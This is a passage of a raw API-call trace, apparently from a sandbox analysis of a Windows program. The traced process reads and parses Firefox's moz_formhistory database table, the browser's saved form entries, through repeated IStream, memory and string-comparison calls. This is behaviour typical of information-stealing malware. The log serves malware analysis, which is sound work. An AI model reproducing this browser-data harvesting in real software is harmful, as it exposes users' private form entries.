dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0591.101] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x8f) returned 0x58d970 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d970) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0591.101] LocalFree (hMem=0x58d970) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x8f) returned 0x58d970 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x1b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d970) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56fe98 [0591.101] LocalFree (hMem=0x58d970) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.101] IStream:LockRegion (This=0x63a0f8, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.101] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da93) returned 0x0 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.101] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x2edbad0 [0591.102] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.102] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.102] IStream:LockRegion (This=0x63a0f8, libOffset=0x2b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.102] IStream:SetSize (This=0x63a0f8, libNewSize=0x2edbad0) returned 0x0 [0591.102] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x2edbc08 [0591.102] LocalFree (hMem=0x2edbad0) returned 0x0 [0591.102] LocalFree (hMem=0x570078) returned 0x0 [0591.102] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.102] lstrcmpiA (lpString1="moz_formhistory", lpString2="moz_formhistory") returned 0 [0591.102] lstrcmpA (lpString1="table", lpString2="table") returned 0 [0591.102] StrStrIA (lpFirst="CREATE TABLE moz_formhistory (id INTEGER PRIMARY KEY, fieldname TEXT NOT NULL, value TEXT NOT NULL, timesUsed INTEGER, firstUsed INTEGER, lastUsed INTEGER, guid TEXT)", lpSrch="(") returned="(id INTEGER PRIMARY KEY, fieldname TEXT NOT NULL, value TEXT NOT NULL, timesUsed INTEGER, firstUsed INTEGER, lastUsed INTEGER, guid TEXT)" [0591.102] StrStrIA (lpFirst="id INTEGER PRIMARY KEY, fieldname TEXT NOT NULL, value TEXT NOT NULL, timesUsed INTEGER, firstUsed INTEGER, lastUsed INTEGER, guid TEXT)", lpSrch=")") returned=")" [0591.102] lstrlenA (lpString="id INTEGER PRIMARY KEY") returned 22 [0591.102] StrStrIA (lpFirst="id INTEGER PRIMARY KEY", lpSrch=" ") returned=" INTEGER PRIMARY KEY" [0591.102] lstrlenA (lpString="id") returned 2 [0591.102] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="fieldname") returned 1 [0591.102] lstrcmpiA (lpString1="id", lpString2="value") returned -1 [0591.102] lstrlenA (lpString=" fieldname TEXT NOT NULL") returned 24 [0591.102] StrStrIA (lpFirst="fieldname TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0591.102] lstrlenA (lpString="fieldname") returned 9 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="fieldname") returned 0 [0591.102] lstrcmpiA (lpString1="fieldname", lpString2="value") returned -1 [0591.102] lstrlenA (lpString=" value TEXT NOT NULL") returned 20 [0591.102] StrStrIA (lpFirst="value TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0591.102] lstrlenA (lpString="value") returned 5 [0591.102] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="fieldname") returned 1 [0591.102] lstrcmpiA (lpString1="value", lpString2="value") returned 0 [0591.102] lstrlenA (lpString=" timesUsed INTEGER") returned 18 [0591.102] StrStrIA (lpFirst="timesUsed INTEGER", lpSrch=" ") returned=" INTEGER" [0591.102] lstrlenA (lpString="timesUsed") returned 9 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0591.102] lstrcmpiA (lpString1="timesUsed", lpString2="fieldname") returned 1 [0591.103] lstrcmpiA (lpString1="timesUsed", lpString2="value") returned -1 [0591.103] lstrlenA (lpString=" firstUsed INTEGER") returned 18 [0591.103] StrStrIA (lpFirst="firstUsed INTEGER", lpSrch=" ") returned=" INTEGER" [0591.103] lstrlenA (lpString="firstUsed") returned 9 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="fieldname") returned 1 [0591.103] lstrcmpiA (lpString1="firstUsed", lpString2="value") returned -1 [0591.103] lstrlenA (lpString=" lastUsed INTEGER") returned 17 [0591.103] StrStrIA (lpFirst="lastUsed INTEGER", lpSrch=" ") returned=" INTEGER" [0591.103] lstrlenA (lpString="lastUsed") returned 8 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="fieldname") returned 1 [0591.103] lstrcmpiA (lpString1="lastUsed", lpString2="value") returned -1 [0591.103] lstrlenA (lpString=" guid TEXT)") returned 11 [0591.103] StrStrIA (lpFirst="guid TEXT)", lpSrch=" ") returned=" TEXT)" [0591.103] lstrlenA (lpString="guid") returned 4 [0591.103] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="fieldname") returned 1 [0591.103] lstrcmpiA (lpString1="guid", lpString2="value") returned -1 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da77) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8001, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da76) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8003, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da76) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8005, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da76) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.103] IStream:LockRegion (This=0x63a0a8, libOffset=0x8007, cb=0x0, dwLockType=0x0) returned 0x0 [0591.103] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da77) returned 0x0 [0591.103] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2f1f7f8 [0591.104] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.104] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.104] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.104] LocalFree (hMem=0x56fe98) returned 0x0 [0591.104] LocalFree (hMem=0x58d970) returned 0x0 [0591.104] LocalFree (hMem=0x2edbc08) returned 0x0 [0591.104] LocalFree (hMem=0x56ff38) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e91, cb=0x0, dwLockType=0x0) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e91, cb=0x0, dwLockType=0x0) returned 0x0 [0591.104] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e92, cb=0x0, dwLockType=0x0) returned 0x0 [0591.104] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e93, cb=0x0, dwLockType=0x0) returned 0x0 [0591.104] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.104] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f1f7f8 [0591.104] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52daf4 | out: ppstm=0x52daf4*=0x63a0f8) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e94, cb=0x0, dwLockType=0x0) returned 0x0 [0591.104] IStream:SetSize (This=0x63a0a8, libNewSize=0x2f1f7f8) returned 0x0 [0591.104] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2f1f7f8) returned 0x0 [0591.104] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.104] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.105] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.105] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x23, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.105] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da93) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.105] IStream:LockRegion (This=0x63a0f8, libOffset=0x3b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.105] IStream:SetSize (This=0x63a0f8, libNewSize=0x2ed0060) returned 0x0 [0591.106] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.106] LocalFree (hMem=0x56ff38) returned 0x0 [0591.106] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.106] lstrcmpiA (lpString1="moz_deleted_formhistory", lpString2="moz_formhistory") returned -1 [0591.106] LocalFree (hMem=0x58d970) returned 0x0 [0591.106] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.106] LocalFree (hMem=0x5d1978) returned 0x0 [0591.106] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.106] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.106] LocalFree (hMem=0x56fe98) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e1e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e1e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e1f, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.106] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52daf4 | out: ppstm=0x52daf4*=0x63a0f8) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0a8, libOffset=0x7e20, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0a8, libNewSize=0x2f1f7f8) returned 0x0 [0591.106] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2f1f7f8) returned 0x0 [0591.106] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.106] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.106] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, 